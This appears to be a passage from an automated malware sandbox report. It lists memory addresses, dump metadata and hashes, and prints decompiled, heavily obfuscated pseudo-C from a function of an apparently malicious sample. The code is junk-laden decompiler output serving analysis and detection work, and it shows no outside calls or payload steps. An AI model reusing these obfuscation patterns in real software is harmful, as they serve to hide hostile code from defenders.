                                                                                                    0x00a80e8b
                                                                                                    0x00a80e91
                                                                                                    0x00a80e00
                                                                                                    0x00a80e03
                                                                                                    0x00a80e03
                                                                                                    0x00a80e07
                                                                                                    0x00a80e0f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80e0f
                                                                                                    0x00a80e97
                                                                                                    0x00a80e9c
                                                                                                    0x00a8113e
                                                                                                    0x00a81141
                                                                                                    0x00a81143
                                                                                                    0x00a80eb1
                                                                                                    0x00a80eb1
                                                                                                    0x00a80eb4
                                                                                                    0x00a80eb6
                                                                                                    0x00a81110
                                                                                                    0x00a81112
                                                                                                    0x00adea25
                                                                                                    0x00adea25
                                                                                                    0x00a80ec3
                                                                                                    0x00a80ec3
                                                                                                    0x00a80ecb
                                                                                                    0x00a810fe
                                                                                                    0x00a80ed1
                                                                                                    0x00a80ed1
                                                                                                    0x00a80ed1
                                                                                                    0x00a80ed3
                                                                                                    0x00a80edb
                                                                                                    0x00adea2d
                                                                                                    0x00adea2f
                                                                                                    0x00adea31
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00adea37
                                                                                                    0x00adea37
                                                                                                    0x00adea3a
                                                                                                    0x00adea3e
                                                                                                    0x00adea47
                                                                                                    0x00adea4a
                                                                                                    0x00adea4c
                                                                                                    0x00adea4d
                                                                                                    0x00adea4d
                                                                                                    0x00adea4e
                                                                                                    0x00adea4e
                                                                                                    0x00adea51
                                                                                                    0x00adea52
                                                                                                    0x00adea52
                                                                                                    0x00000000
                                                                                                    0x00a80ee1
                                                                                                    0x00a80ee1
                                                                                                    0x00a80ee1
                                                                                                    0x00a80ee3
                                                                                                    0x00a80ee3
                                                                                                    0x00a80ee6
                                                                                                    0x00a80eec
                                                                                                    0x00adea5b
                                                                                                    0x00adea5d
                                                                                                    0x00a80ef6
                                                                                                    0x00a80ef8
                                                                                                    0x00adea6f
                                                                                                    0x00adea6f
                                                                                                    0x00a80efe
                                                                                                    0x00a80efe
                                                                                                    0x00a80f03
                                                                                                    0x00adea7b
                                                                                                    0x00adea7d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00adea83
                                                                                                    0x00adea85
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00adea8b
                                                                                                    0x00adea91
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00adea97
                                                                                                    0x00adea9a
                                                                                                    0x00adeaa0
                                                                                                    0x00adeaa2
                                                                                                    0x00adeaa2
                                                                                                    0x00adeaae
                                                                                                    0x00adeab3
                                                                                                    0x00adeab6
                                                                                                    0x00adeabf
                                                                                                    0x00adeaca
                                                                                                    0x00adeacd
                                                                                                    0x00adead1
                                                                                                    0x00adead1
                                                                                                    0x00adeab8
                                                                                                    0x00adeab8
                                                                                                    0x00adeab8
                                                                                                    0x00adead2
                                                                                                    0x00adead9
                                                                                                    0x00a80f0e
                                                                                                    0x00a80f15
                                                                                                    0x00a80f17
                                                                                                    0x00a80f17
                                                                                                    0x00a80f1e
                                                                                                    0x00a80f23
                                                                                                    0x00adeae1
                                                                                                    0x00adeae1
                                                                                                    0x00a80f38
                                                                                                    0x00a80f3a
                                                                                                    0x00a80f3a
                                                                                                    0x00a80f49
                                                                                                    0x00a81108
                                                                                                    0x00a81108
                                                                                                    0x00a80f5b
                                                                                                    0x00a810c7
                                                                                                    0x00a810ca
                                                                                                    0x00a810cc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a810dc
                                                                                                    0x00a810de
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80f61
                                                                                                    0x00a80f61
                                                                                                    0x00a80f61
                                                                                                    0x00a80f67
                                                                                                    0x00a80f6b
                                                                                                    0x00a8111d
                                                                                                    0x00a8111d
                                                                                                    0x00a80f75
                                                                                                    0x00a80f77
                                                                                                    0x00a80f77
                                                                                                    0x00a80f85
                                                                                                    0x00a80f8b
                                                                                                    0x00a810b9
                                                                                                    0x00a810bc
                                                                                                    0x00adeae9
                                                                                                    0x00adeae9
                                                                                                    0x00a80f91
                                                                                                    0x00a80f91
                                                                                                    0x00a80f91
                                                                                                    0x00a80f96
                                                                                                    0x00a80f98
                                                                                                    0x00a80f9a
                                                                                                    0x00a80f9a
                                                                                                    0x00a80fa6
                                                                                                    0x00a8107c
                                                                                                    0x00a8107f
                                                                                                    0x00a8108d
                                                                                                    0x00000000
                                                                                                    0x00a8108d
                                                                                                    0x00a81081
                                                                                                    0x00a81087
                                                                                                    0x00adeaf4
                                                                                                    0x00adeafa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00adeb00
                                                                                                    0x00000000
                                                                                                    0x00a80fac
                                                                                                    0x00a80fac
                                                                                                    0x00000000
                                                                                                    0x00a80fac
                                                                                                    0x00a80fa6
                                                                                                    0x00a80f5b
                                                                                                    0x00a80f09
                                                                                                    0x00a80f09
                                                                                                    0x00000000
                                                                                                    0x00a80f09
                                                                                                    0x00adea63
                                                                                                    0x00000000
                                                                                                    0x00adea63
                                                                                                    0x00a80ef4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80ef4
                                                                                                    0x00a80ebc
                                                                                                    0x00a80ebc
                                                                                                    0x00000000
                                                                                                    0x00a80ebc
                                                                                                    0x00a80eb6
                                                                                                    0x00a81149
                                                                                                    0x00a8114c
                                                                                                    0x00a8114d
                                                                                                    0x00000000
                                                                                                    0x00a8114d
                                                                                                    0x00a80ea4
                                                                                                    0x00a80ea7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80fb7
                                                                                                    0x00a80fb7
                                                                                                    0x00a80fbc
                                                                                                    0x00a80fc9
                                                                                                    0x00a80fc9
                                                                                                    0x00a80fce
                                                                                                    0x00a81020
                                                                                                    0x00a81025
                                                                                                    0x00a81094
                                                                                                    0x00a81094
                                                                                                    0x00a81099
                                                                                                    0x00adea04
                                                                                                    0x00adea04
                                                                                                    0x00adea09
                                                                                                    0x00adea1c
                                                                                                    0x00adea0b
                                                                                                    0x00adea0b
                                                                                                    0x00adea0e
                                                                                                    0x00adea14
                                                                                                    0x00adea14
                                                                                                    0x00adea0e
                                                                                                    0x00adea09
                                                                                                    0x00a81027
                                                                                                    0x00a81027
                                                                                                    0x00a81155
                                                                                                    0x00a8102d
                                                                                                    0x00a8102d
                                                                                                    0x00a8102d
                                                                                                    0x00a81032
                                                                                                    0x00ade9fc
                                                                                                    0x00ade9fc
                                                                                                    0x00a81032
                                                                                                    0x00a81027
                                                                                                    0x00000000
                                                                                                    0x00a81025
                                                                                                    0x00a80fd0
                                                                                                    0x00ade9f4
                                                                                                    0x00000000
                                                                                                    0x00ade9f4
                                                                                                    0x00a80fd6
                                                                                                    0x00a80fd9
                                                                                                    0x00a81059
                                                                                                    0x00a81059
                                                                                                    0x00a8105e
                                                                                                    0x00ade9ec
                                                                                                    0x00a81064
                                                                                                    0x00a81064
                                                                                                    0x00a81064
                                                                                                    0x00a81069
                                                                                                    0x00a810ac
                                                                                                    0x00a8106b
                                                                                                    0x00a8106b
                                                                                                    0x00a8106e
                                                                                                    0x00a81074
                                                                                                    0x00a81074
                                                                                                    0x00a8106e
                                                                                                    0x00a81069
                                                                                                    0x00000000
                                                                                                    0x00a8105e
                                                                                                    0x00a80fdb
                                                                                                    0x00a810a4
                                                                                                    0x00000000
                                                                                                    0x00a810a4
                                                                                                    0x00a80fe1
                                                                                                    0x00a80fe4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80fea
                                                                                                    0x00a80ff1
                                                                                                    0x00000000
                                                                                                    0x00a80ff8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ade9e4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a81018
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a81051
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80ff1
                                                                                                    0x00a80fbe
                                                                                                    0x00a80fc3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a80fc3
                                                                                                    0x00a80df3
                                                                                                    0x00ade9d5
                                                                                                    0x00ade9d7
                                                                                                    0x00a81128
                                                                                                    0x00a81128
                                                                                                    0x00a8112b
                                                                                                    0x00a8112d
                                                                                                    0x00a81133
                                                                                                    0x00a81133
                                                                                                    0x00000000
                                                                                                    0x00a8112d
                                                                                                    0x00000000
                                                                                                    0x00ade9d7
                                                                                                    0x00a80dc2
                                                                                                    0x00a810f6
                                                                                                    0x00a80dd4
                                                                                                    0x00a80dd7
                                                                                                    0x00a80dda
                                                                                                    0x00a80de8
                                                                                                    0x00a80de9
                                                                                                    0x00a80de9
                                                                                                    0x00a80dda
                                                                                                    0x00000000
                                                                                                    0x00a80dc2
                                                                                                    0x00a80dac
                                                                                                    0x00a80dae
                                                                                                    0x00a80db3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a6207b6ae52312fa95cdc33f1f2a790c10d4f5f9fd1a4784d989557df2bc003
                                                                                                    • Instruction ID: e7536329a799e93df851509bec414c915585f249b3f053716ac865e932864ffa
                                                                                                    • Opcode Fuzzy Hash: 6a6207b6ae52312fa95cdc33f1f2a790c10d4f5f9fd1a4784d989557df2bc003
                                                                                                    • Instruction Fuzzy Hash: 8CD1E631E042498BDF68EF99C494BFEB7B5FB44301F24852AD542AB395D7788D8ACB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044B6E6, Relevance: .4, Instructions: 360COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E0044B6E6(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				signed char _t40;
				signed char _t44;
				signed char _t50;
				signed char _t51;
				signed int _t69;
				signed int _t75;
				signed int _t77;

				_t40 = 0x63;
				 *0xaaef85d7 =  *0xaaef85d7 >> 0x5c;
				asm("sbb dh, 0x80");
				asm("rcl dword [0x61b041fa], 0xd3");
				_t50 =  *0x9d113d0b;
				_pop( *0x8777ef0e);
				 *0x61b041fb =  *0x61b041fb + __edx;
				asm("rcr byte [0xf13f7932], 0x57");
				 *0xb236b8a8 =  *0xb236b8a8 - 0x63;
				_t44 = __ebx + 1 +  *0xeb9e991;
				 *0x2da9d98a =  *0x2da9d98a << 0x6c;
				_t75 =  *0xe86e4b98;
				_t69 =  *0x1f72f36b * 0xb9d1;
				asm("scasb");
				_pop(_t77);
				asm("cmpsw");
				 *0xf0d7f9d8 =  *0xf0d7f9d8 << 0x7e;
				asm("rol dword [0x70c3bf9e], 0x8b");
				_t56 = __edx &  *0x12834b8d;
				asm("adc esi, [0x8933589e]");
				if((__edx &  *0x12834b8d) > 0) {
					L1:
					_t75 = _t75 -  *0xd6d4e09;
					_push( *0x92af3c21);
					asm("adc edi, [0xdd0dd9fc]");
				} else {
					__ebp =  *0xbccf2a7f * 0xa20d;
					__esi = __esi + 1;
					if(__esi < 0 || ( *0x66169e78 & __esp) <= 0) {
						goto L1;
					} else {
						__eax =  *0xd834a7e * 0xd05d;
						 *0x3a7da665 = __edi;
						asm("rcl byte [0x17cd4dd2], 0xc5");
						__ch = __ch - 0xa;
						__edi = __edi ^  *0xe1103b2b;
						asm("ror dword [0x16ba739f], 0x2d");
						__ebx = __ebx - 1;
						__esp = __esp & 0x1b25acf7;
						asm("rcr dword [0x27ce19f0], 0xa7");
						 *0x4f07ca1a =  *0x4f07ca1a << 0xb7;
						 *0x722291eb = __ebx;
						__edx = __edx + 0x47099b1e;
						if(__edx < 0) {
							goto L1;
						} else {
							 *0x3bcf1f70 =  *0x3bcf1f70 << 0x47;
							 *0xd91552eb = __esp;
							 *0xa091730a =  *0xa091730a >> 0xf6;
							asm("adc eax, [0x4221b5c5]");
							 *0x776fa98b =  *0x776fa98b << 0x5c;
							if( *0x776fa98b < 0) {
								goto L1;
							} else {
								 *0x6e946478 = __edi;
								__edx = __edx - 0xd0a076f4;
								_t31 = __ebx;
								__ebx =  *0xdb4fc0cb;
								 *0xdb4fc0cb = _t31;
								__edx = __edx ^ 0xf51be58c;
								 *0xdd11ff10 =  *0xdd11ff10 << 0x35;
								__ebp = __ebp | 0x30108894;
								asm("adc edi, [0x734d403e]");
								 *0x9b7e1484 =  *0x9b7e1484 >> 0xb0;
								__ebx =  *0xdb4fc0cb |  *0xcb126dd8;
								__ecx = __ecx + 1;
								 *0x42fcede0 =  *0x42fcede0 + 0x63;
								__eax = __eax - 1;
								asm("sbb esp, 0x82e4b9fc");
								asm("rcl dword [0x8b9c4b83], 0x8e");
								__ebp = __ebp +  *0xaa319e94;
								__edi = __ebx;
								 *0x99b5cfc4 =  *0x99b5cfc4 ^ __ebp;
								asm("stosb");
								asm("movsw");
								 *0xcf28c03d = 0x336a3b83;
								_push(__ebx);
								 *0xc26e90c2 =  *0xc26e90c2 | __ebp;
								asm("rcr byte [0xc7a5663a], 0xe8");
								 *0x212a1ddf =  *0x212a1ddf ^ __edx;
								__al = __al |  *0xea40fb6;
								__ebp = __ebp +  *0xf817b6dd;
								asm("adc ah, 0xe7");
								asm("adc edi, [0xe1607799]");
								asm("sbb dl, 0xb0");
								asm("sbb [0x7d7c0fe3], al");
								__al = __al |  *0xa729b62c;
								__ecx =  *0x4f97617;
								__esi = __esi +  *0x597720f;
								L1();
								__bh =  *0x2cd78a3a;
								 *0xae6163cd = __esi;
								asm("sbb [0x133830ff], ebp");
								__ebp = __ebp &  *0x82679c8c;
								if(__edx < 0) {
									goto L1;
								} else {
									__ebp = __ebp -  *0xff4b4f72;
									__ebp = __ebp ^  *0xc4ba408c;
									_t34 = __ebp;
									__ebp =  *0x4709ec1;
									 *0x4709ec1 = _t34;
									__eax = __eax + 1;
									if(__eax < 0) {
										goto L1;
									} else {
										__edx =  *0xfcded17c * 0xb847;
										 *0x9e62233a =  *0x9e62233a - __ah;
										__ecx = __ecx &  *0xe6777ec1;
										__al = __al + 0xb0;
										asm("sbb [0x883e886e], eax");
										asm("scasd");
										__esp = __esp |  *0xbe65e2c8;
										 *0x1307fe83 =  *0x1307fe83 >> 0xfc;
										asm("adc edi, [0x768be2f4]");
										asm("adc esi, [0xeb1602f0]");
										 *0x933db12c =  *0x933db12c - __cl;
										__ecx = 0x538b47c1;
										__ebx = __ebx |  *0xa4589766;
										__esp = __esp ^  *0xcc9360d6;
										 *0x94be7e33 =  *0x94be7e33 - __ebx;
										_push(0x538b47c1);
										__esi =  *0xa0bbaddd;
										__ebx = __ebx + 1;
										asm("sbb ecx, [0x7e6798d1]");
										__edx =  *0xfcded17c * 0x0000b847 |  *0xd5b3052d;
										__ebp = __ebp + 0x54868ea;
										if(__ebp > 0) {
											goto L1;
										} else {
											__edx =  *0x60d1b77f * 0x548;
											asm("ror dword [0x5fddcfa3], 0xc");
											__eax = __eax - 1;
											 *0x23502305 =  *0x23502305 + __edi;
											__edi =  *0x6b05486b * 0x1f57;
											__eax =  *0xbb054869 * 0xc3b6;
											_pop(__ecx);
											__eax =  *0xbb054869 * 0xc3b6 - 1;
											__edi = 0xe8fda603;
											 *0xa1c604 =  *0xa1c604 + __cl;
											__esi = __esi | 0xe47a04bd;
											__edx =  *0x60d1b77f * 0x00000548 &  *0x4404bdfb;
											 *0x4bd0502 =  *0x4bd0502 - __dl;
											__eax =  *0xbb054869 * 0xc3b6;
											__edi = 0xe8fda603 +  *0xcfef9405;
											__edi = __ebp;
											__eax =  *0xbb054869 * 0xc3b6 - 0xffffffffffffffff;
											__ebx =  *0xceb5bd05;
											_pop(__ebp);
											__eax =  *0xbb054869 * 0xc3b6 - 0xfffffffffffffffe;
											__ecx = 0xd0ee1bba;
											 *0x50722207 =  *0x50722207 >> 0x88;
											if(__eax <  *0x9b095b95) {
												goto L1;
												do {
													do {
														do {
															do {
																do {
																	do {
																		goto L1;
																	} while (_t75 >= 0);
																	_t51 = _t50 - 1;
																	asm("rol dword [0xa9553596], 0xc3");
																	_t69 = _t69 + 1;
																	 *0xe0879028 =  *0xe0879028 | _t51;
																	_t50 = _t51 +  *0x8dbda16;
																	_t56 = 0xc3b1061 -  *0x29e2c8dc;
																	_push( *0x6f95ed05);
																} while (0xc3b1061 >= 0xff834b9);
																_t69 = _t69 & 0x3491e20e;
																_t50 =  *0xf0ece6bd;
																 *0xf0ece6bd =  *0x310d487d * 0xc9ee;
																 *0x54133b1e =  *0x54133b1e ^ _t75;
																asm("rol dword [0x49f2711d], 0x37");
																asm("sbb edi, [0xf6fb63f0]");
															} while ( *0x54133b1e >= 0);
															_t75 = _t75 -  *0xf052e179;
															 *0x898fdca2 =  *0x898fdca2 << 0x59;
															asm("sbb esi, 0x7a830803");
															asm("sbb dl, [0xedb00aca]");
															asm("sbb ah, [0x86651c38]");
															 *0xb4e1bdb = _t56;
															_t77 = _t77 ^  *0x1d05d9df;
															_t56 =  *0x4863efee;
															 *0x4863efee =  *0xb4e1bdb;
															_t44 = (_t44 | 0x0000003a) &  *0xce97fdce | 0x0000000a;
														} while (_t44 > 0);
														 *0x34facd17 =  *0x34facd17 << 0xd0;
														asm("adc ecx, 0xce473839");
														asm("adc [0xdd4b29e2], dl");
														asm("lodsd");
														asm("rol byte [0x3abc98a2], 0x27");
														_t69 = 0xa9f28bd8 +  *0x12e391ce;
														_push(_t77);
														_push(_t75);
														 *0x1bf947f0 =  *0x1bf947f0 - _t77;
														_t77 = _t77 ^ 0x0286d09b;
														_t40 = _t40 & 0x000000d2;
														asm("sbb eax, [0x8260a58e]");
														_t44 = _t44 - 1;
														asm("sbb edx, [0x93b52b83]");
														asm("adc ebp, [0x9b38133d]");
														_t50 = _t50 +  *0x359c84b4;
														_t56 = _t56 &  *0xdb5b4dc0;
														asm("adc ecx, 0xc547de92");
														_push( *0xdf038bf3);
														asm("rcl byte [0xad722e2], 0x17");
														 *0x6c5d652a =  *0x6c5d652a + _t44;
														asm("sbb ah, [0xf5d2cf2c]");
														 *0x3a08c695 = 0x4b0f1676;
														_push(0x8bc16a1e);
													} while (( *0x98d0263f & 0xa9f28bd8) != 0);
													asm("adc esi, 0xdc14647b");
													_t44 = _t44 - 1;
													 *0x31a4ba03 =  *0x31a4ba03 << 0xbc;
													 *0x53bc9564 =  *0x53bc9564 & 0xa9f28bd8;
													 *0x7ce8e6f4 =  *0x7ce8e6f4 << 0x8e;
													_t69 = _t69 - 0x2ddb22c2;
													 *0x2b41d9f9 =  *0x2b41d9f9 >> 0x15;
													 *0x11774c30 =  *0x11774c30 << 0x33;
													_t75 = _t75 ^ 0x7c6b55cb;
													_t77 = _t77 +  *0xe8313764;
													_t50 = 0x480d832e ^  *0x757162e3;
												} while (_t50 != 0);
												 *0x7d8e83e0 = _t56;
												asm("sbb eax, 0xf3eddf65");
												asm("sbb [0x61f8b91a], dh");
												asm("adc edx, 0x3d743c39");
												asm("cmpsw");
												asm("ror byte [0xa776fff2], 0xf9");
												 *0x6b95c4ef =  *0x6b95c4ef | _t75 &  *0x867701de;
												_push(_t50);
												asm("cmpsb");
												 *0x1be2c49f =  *0x7d8e83e0;
												asm("adc eax, 0x701e721");
												 *0x52bb42d9 =  *0x52bb42d9 << 0x6d;
												_push( *0x25fb150d);
												return  *0x44532e6a * 0xecb7;
											} else {
												asm("sbb esi, [0x9b074e72]");
												asm("sbb edi, 0x13bfe107");
												 *0x9b0d5864 =  *0x9b0d5864 & __esi;
												__eax = __eax +  *0x37da1807;
												__edx = __edx ^  *0x9b15f593;
												asm("rcl byte [0x9a50a08], 0x83");
												 *0xc91e3d =  *0xc91e3d << 0x42;
												__ebx =  *0xdd30080f;
												__eax = __eax ^ 0x15a2080f;
												__ebx =  *0xdd30080f |  *0x50080f07;
												asm("adc ebx, [0x53fab605]");
												asm("sbb ah, 0x88");
												asm("adc esi, 0xcf090f0e");
												__ebp = 0x964cd3c7;
												__dl = __dl ^  *0xd92d68b1;
												asm("adc ecx, [0x8257409]");
												_pop(__eax);
												 *0x154bcd34 = __dl;
												__esp = __esp -  *0x8b2809d9;
												asm("sbb al, 0x1a");
												__ch = 0xc9;
												 *0x2e7af12f =  *0x2e7af12f + __ebx;
												asm("adc esp, [0xc5be0ad9]");
												asm("adc ebp, [0xcf71490f]");
												__esi = __esi - 0xce5851f4;
												 *0x2c576a10 =  *0x2c576a10 << 0x6c;
												__dh = __dh ^ 0x000000e0;
												 *0xde5d87fa =  *0xde5d87fa << 0xf1;
												 *0xaebdb211 =  *0xaebdb211 >> 0xb3;
												asm("sbb edx, [0xa2f53aec]");
												asm("rcr dword [0x8719ad83], 0xe6");
												__bh = __bh ^ 0x0000002c;
												__edi = __edi +  *0xef7086bf;
												__dl = __dl ^ 0x00000020;
												asm("sbb [0xcb5b9c14], dl");
												__esp = __esp +  *0x73ba932b;
												 *0x2f402a2a = __dh;
												__edi = __edi |  *0x58d368a9;
												 *0x8873126c =  *0x8873126c - __edx;
												 *0x285708b5 =  *0x285708b5 << 0x3a;
												 *0xf240f48a =  *0xf240f48a & __cl;
												 *0xb0e32598 =  *0xb0e32598 & __ebx;
												 *0x83593c9e =  *0x83593c9e - __ebx;
												asm("adc esi, 0x78a3fa0b");
												__esp = __esp |  *0x6180cf8f;
												 *0x5db38906 =  *0x5db38906 & __esp;
												__esi = __esi +  *0xfbb8122f;
												asm("adc esp, 0xdb217bf0");
												 *0xd3699f07 =  *0xd3699f07 >> 0xad;
												_push(0xe8fda603);
												__bh = __bh + 0xca;
												asm("ror dword [0xa46a169b], 0xe8");
												__esi = __esi &  *0xd41cb43b;
												__edx =  *0xb3894a6a * 0x9d7c;
												__eax = 0x887e5507;
												asm("sbb [0xb981e439], edx");
												__cl = __cl &  *0x4a11f228;
												__eax = 0x887e5507 -  *0x521e813;
												asm("rcl byte [0x17b63db6], 0x10");
												 *0x531eef6d =  *0x531eef6d >> 0x29;
												asm("adc eax, [0x202aadeb]");
												__cl =  *0x3de6c41c;
												 *0x864bb80 =  *0x864bb80 >> 0xf4;
												__bh = 0x82;
												__dl = __dl | 0x000000e5;
												__al = __al & 0x0000000c;
												_push( *0x2fd8b0c7);
												 *0x8a101ea3 =  *0x8a101ea3 ^ __edi;
												__esi = __esi + 1;
												asm("adc esi, 0xda21c62b");
												return 0x887e5507 -  *0x521e813;
											}
										}
									}
								}
							}
						}
					}
				}
			}










                                                                                                    0x0044b6e6
                                                                                                    0x0044b6e8
                                                                                                    0x0044b6ff
                                                                                                    0x0044b702
                                                                                                    0x0044b709
                                                                                                    0x0044b70f
                                                                                                    0x0044b715
                                                                                                    0x0044b721
                                                                                                    0x0044b728
                                                                                                    0x0044b72e
                                                                                                    0x0044b734
                                                                                                    0x0044b73b
                                                                                                    0x0044b741
                                                                                                    0x0044b74e
                                                                                                    0x0044b74f
                                                                                                    0x0044b750
                                                                                                    0x0044b758
                                                                                                    0x0044b75f
                                                                                                    0x0044b766
                                                                                                    0x0044b76c
                                                                                                    0x0044b772
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044b778
                                                                                                    0x0044b778
                                                                                                    0x0044b782
                                                                                                    0x0044b783
                                                                                                    0x00000000
                                                                                                    0x0044b795
                                                                                                    0x0044b795
                                                                                                    0x0044b79f
                                                                                                    0x0044b7a5
                                                                                                    0x0044b7ac
                                                                                                    0x0044b7af
                                                                                                    0x0044b7b5
                                                                                                    0x0044b7bc
                                                                                                    0x0044b7bd
                                                                                                    0x0044b7c3
                                                                                                    0x0044b7ca
                                                                                                    0x0044b7d1
                                                                                                    0x0044b7d7
                                                                                                    0x0044b7dd
                                                                                                    0x00000000
                                                                                                    0x0044b7e3
                                                                                                    0x0044b7e3
                                                                                                    0x0044b7ea
                                                                                                    0x0044b7f0
                                                                                                    0x0044b803
                                                                                                    0x0044b809
                                                                                                    0x0044b810
                                                                                                    0x00000000
                                                                                                    0x0044b816
                                                                                                    0x0044b816
                                                                                                    0x0044b81e
                                                                                                    0x0044b824
                                                                                                    0x0044b824
                                                                                                    0x0044b824
                                                                                                    0x0044b82a
                                                                                                    0x0044b830
                                                                                                    0x0044b837
                                                                                                    0x0044b842
                                                                                                    0x0044b848
                                                                                                    0x0044b855
                                                                                                    0x0044b85c
                                                                                                    0x0044b85e
                                                                                                    0x0044b86a
                                                                                                    0x0044b86b
                                                                                                    0x0044b871
                                                                                                    0x0044b878
                                                                                                    0x0044b87e
                                                                                                    0x0044b87f
                                                                                                    0x0044b885
                                                                                                    0x0044b886
                                                                                                    0x0044b888
                                                                                                    0x0044b894
                                                                                                    0x0044b895
                                                                                                    0x0044b89b
                                                                                                    0x0044b8a2
                                                                                                    0x0044b8a8
                                                                                                    0x0044b8b4
                                                                                                    0x0044b8ba
                                                                                                    0x0044b8bd
                                                                                                    0x0044b8c3
                                                                                                    0x0044b8c6
                                                                                                    0x0044b8cc
                                                                                                    0x0044b8d2
                                                                                                    0x0044b8d8
                                                                                                    0x0044b8de
                                                                                                    0x0044b8e9
                                                                                                    0x0044b8ef
                                                                                                    0x0044b8f5
                                                                                                    0x0044b8fb
                                                                                                    0x0044b902
                                                                                                    0x00000000
                                                                                                    0x0044b908
                                                                                                    0x0044b908
                                                                                                    0x0044b90e
                                                                                                    0x0044b915
                                                                                                    0x0044b915
                                                                                                    0x0044b915
                                                                                                    0x0044b91b
                                                                                                    0x0044b91c
                                                                                                    0x00000000
                                                                                                    0x0044b922
                                                                                                    0x0044b922
                                                                                                    0x0044b92c
                                                                                                    0x0044b932
                                                                                                    0x0044b938
                                                                                                    0x0044b93a
                                                                                                    0x0044b940
                                                                                                    0x0044b941
                                                                                                    0x0044b947
                                                                                                    0x0044b94e
                                                                                                    0x0044b954
                                                                                                    0x0044b95a
                                                                                                    0x0044b960
                                                                                                    0x0044b965
                                                                                                    0x0044b96b
                                                                                                    0x0044b977
                                                                                                    0x0044b97d
                                                                                                    0x0044b984
                                                                                                    0x0044b985
                                                                                                    0x0044b992
                                                                                                    0x0044b998
                                                                                                    0x0044b99e
                                                                                                    0x0044b9a4
                                                                                                    0x00000000
                                                                                                    0x0044b9aa
                                                                                                    0x0044b9aa
                                                                                                    0x0044b9b4
                                                                                                    0x0044b9bb
                                                                                                    0x0044b9bc
                                                                                                    0x0044b9c2
                                                                                                    0x0044b9cc
                                                                                                    0x0044b9d6
                                                                                                    0x0044b9d7
                                                                                                    0x0044b9d8
                                                                                                    0x0044b9de
                                                                                                    0x0044b9e4
                                                                                                    0x0044b9ea
                                                                                                    0x0044b9f0
                                                                                                    0x0044ba03
                                                                                                    0x0044ba04
                                                                                                    0x0044ba0a
                                                                                                    0x0044ba0b
                                                                                                    0x0044ba0c
                                                                                                    0x0044ba12
                                                                                                    0x0044ba13
                                                                                                    0x0044ba14
                                                                                                    0x0044ba20
                                                                                                    0x0044ba27
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4c0
                                                                                                    0x0044b4cc
                                                                                                    0x0044b4d3
                                                                                                    0x0044b4d4
                                                                                                    0x0044b4da
                                                                                                    0x0044b4e0
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4fe
                                                                                                    0x0044b504
                                                                                                    0x0044b504
                                                                                                    0x0044b50a
                                                                                                    0x0044b510
                                                                                                    0x0044b517
                                                                                                    0x0044b517
                                                                                                    0x0044b51f
                                                                                                    0x0044b532
                                                                                                    0x0044b539
                                                                                                    0x0044b548
                                                                                                    0x0044b54e
                                                                                                    0x0044b560
                                                                                                    0x0044b566
                                                                                                    0x0044b56c
                                                                                                    0x0044b56c
                                                                                                    0x0044b572
                                                                                                    0x0044b572
                                                                                                    0x0044b581
                                                                                                    0x0044b595
                                                                                                    0x0044b5a1
                                                                                                    0x0044b5a7
                                                                                                    0x0044b5a8
                                                                                                    0x0044b5af
                                                                                                    0x0044b5b6
                                                                                                    0x0044b5b7
                                                                                                    0x0044b5b8
                                                                                                    0x0044b5be
                                                                                                    0x0044b5c4
                                                                                                    0x0044b5c6
                                                                                                    0x0044b5cc
                                                                                                    0x0044b5cd
                                                                                                    0x0044b5d3
                                                                                                    0x0044b5df
                                                                                                    0x0044b5e5
                                                                                                    0x0044b5eb
                                                                                                    0x0044b5f1
                                                                                                    0x0044b5f7
                                                                                                    0x0044b5fe
                                                                                                    0x0044b604
                                                                                                    0x0044b60a
                                                                                                    0x0044b616
                                                                                                    0x0044b616
                                                                                                    0x0044b621
                                                                                                    0x0044b627
                                                                                                    0x0044b628
                                                                                                    0x0044b62f
                                                                                                    0x0044b635
                                                                                                    0x0044b643
                                                                                                    0x0044b64e
                                                                                                    0x0044b655
                                                                                                    0x0044b65c
